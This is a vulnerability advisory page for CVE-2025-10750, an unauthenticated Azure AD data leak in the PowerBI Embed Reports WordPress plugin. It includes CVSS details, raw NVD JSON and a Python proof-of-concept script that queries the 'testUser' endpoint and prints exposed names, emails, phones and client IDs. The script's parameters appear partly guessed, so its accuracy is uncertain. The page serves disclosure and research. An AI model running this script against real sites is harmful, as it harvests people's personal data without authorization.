Security Vulnerability Report
中文
CVE-2025-10750 CVSS 5.3 MEDIUM

CVE-2025-10750

Published: 2025-10-18 08:15:33
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The PowerBI Embed Reports plugin for WordPress is vulnerable to Sensitive Information Disclosure in all versions up to, and including, 1.2.0. This is due to missing capability checks and authentication verification on the 'testUser' endpoint accessible via the mo_epbr_admin_observer() function hooked on 'init'. This makes it possible for unauthenticated attackers to access sensitive Azure AD user information including personal identifiable information (PII) such as displayName, mail, phones, department, or detailed OAuth error data including Azure AD Application/Client IDs, error codes, trace IDs, and correlation IDs.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PowerBI Embed Reports 插件(embed-power-bi-reports)<= 1.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10750 PoC - PowerBI Embed Reports Sensitive Information Disclosure # This PoC demonstrates how an unauthenticated attacker can access # sensitive Azure AD user information via the 'testUser' endpoint import requests # Target WordPress site URL target_url = "http://target-wordpress-site.com" # The 'testUser' endpoint is triggered via the mo_epbr_admin_observer() # function hooked on 'init', so we can trigger it by sending a request # to any WordPress page with specific parameters # Step 1: Trigger the vulnerable endpoint # The endpoint processes requests via the 'init' hook endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Payload to trigger the testUser functionality payload = { "action": "mo_epbr_admin_observer", "mo_epbr_action": "testUser", # Additional parameters may be required depending on plugin configuration } # Step 2: Send unauthenticated request response = requests.post(endpoint, data=payload) # Step 3: Extract sensitive information from response if response.status_code == 200: data = response.json() print("[*] Sensitive Information Disclosed:") # PII Information if "displayName" in str(data): print(f" - Display Name: {data.get('displayName', 'N/A')}") if "mail" in str(data): print(f" - Email: {data.get('mail', 'N/A')}") if "phones" in str(data): print(f" - Phone: {data.get('phones', 'N/A')}") if "department" in str(data): print(f" - Department: {data.get('department', 'N/A')}") # Azure AD Configuration if "AppId" in str(data) or "ClientId" in str(data): print(f" - Azure AD App/Client ID: {data.get('AppId', data.get('ClientId', 'N/A'))}") if "error" in str(data): print(f" - Error Code: {data.get('error', 'N/A')}") if "traceId" in str(data): print(f" - Trace ID: {data.get('traceId', 'N/A')}") if "correlationId" in str(data): print(f" - Correlation ID: {data.get('correlationId', 'N/A')}") else: print(f"[-] Request failed with status code: {response.status_code}") # Note: The exact endpoint and parameters may vary. # The vulnerability is in mo_epbr_admin_observer() function # located in Observer/adminObserver.php (line 265 and line 54) # which is triggered on WordPress 'init' hook without authentication checks.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10750", "sourceIdentifier": "[email protected]", "published": "2025-10-18T08:15:32.673", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The PowerBI Embed Reports plugin for WordPress is vulnerable to Sensitive Information Disclosure in all versions up to, and including, 1.2.0. This is due to missing capability checks and authentication verification on the 'testUser' endpoint accessible via the mo_epbr_admin_observer() function hooked on 'init'. This makes it possible for unauthenticated attackers to access sensitive Azure AD user information including personal identifiable information (PII) such as displayName, mail, phones, department, or detailed OAuth error data including Azure AD Application/Client IDs, error codes, trace IDs, and correlation IDs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/embed-power-bi-reports/tags/1.2.0/Observer/adminObserver.php#L265", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/embed-power-bi-reports/tags/1.2.0/Observer/adminObserver.php#L54", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/embed-power-bi-reports/tags/1.2.0/embed-microsoft-power-bi-reports.php#L75", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3369956%40embed-power-bi-reports&new=3369956%40embed-power-bi-reports&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d830c2eb-16e8-425c-ac46-a467a2fd0133?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.